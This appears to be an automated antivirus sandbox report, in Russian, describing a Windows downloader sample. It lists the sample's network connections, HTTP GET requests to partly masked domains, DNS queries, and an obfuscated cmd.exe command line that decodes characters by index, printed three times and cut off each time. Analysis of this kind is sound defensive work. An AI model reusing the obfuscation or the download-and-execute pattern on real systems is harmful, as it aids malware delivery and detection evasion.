Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set ezn=VQKOfjdvWJwfaCqnGzdmQq2EU:0I+3\-N=L$hR;A eYipu'8k@{Scb,sM\gTZ)o5DlHB}rPtx1y.F(6&&for %N in (35;18;17;16;33;46;44;17;32;46;38;35;17;59;60;33;...
Сетевая активность
Подключается к
- 'bu####ighter.com':80
- 'bu####ighter.com':443
- 'au##l6.net':80
- 'cp#####mancegroup.com':80
- 'cp#####mancegroup.com':443
- 'za#####edomki.com.pl':80
- 'ju####throoms.net':80
- 'ju####throoms.net':443
TCP
Запросы HTTP GET
- http://bu####ighter.com/1SPrQTJg
- http://au##l6.net/zSvH3wqB
- http://cp#####mancegroup.com/oyrsLzI
- http://za#####edomki.com.pl/pPGzDO1
- http://www.za#####edomki.com.pl/pPGzDO1
- http://ju####throoms.net/UvRyeZOq
Другие
- 'bu####ighter.com':443
- 'cp#####mancegroup.com':443
- 'ju####throoms.net':443
UDP
- DNS ASK bu####ighter.com
- DNS ASK au##l6.net
- DNS ASK cp#####mancegroup.com
- DNS ASK za#####edomki.com.pl
- DNS ASK ju####throoms.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set ezn=VQKOfjdvWJwfaCqnGzdmQq2EU:0I+3\-N=L$hR;A eYipu'8k@{Scb,sM\gTZ)o5DlHB}rPtx1y.F(6&&for %N in (35;18;17;16;33;46;44;17;32;46;38;35;17;59;60;33;...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set ezn=VQKOfjdvWJwfaCqnGzdmQq2EU:0I+3\-N=L$hR;A eYipu'8k@{Scb,sM/gTZ)o5DlHB}rPtx1y.F(6&&for %N in (35;18;17;16;33;46;44;17;32;46;38;35;17;59;60;33;15;41;10;31;62;53;5;41;52;71;40;32;41;71...
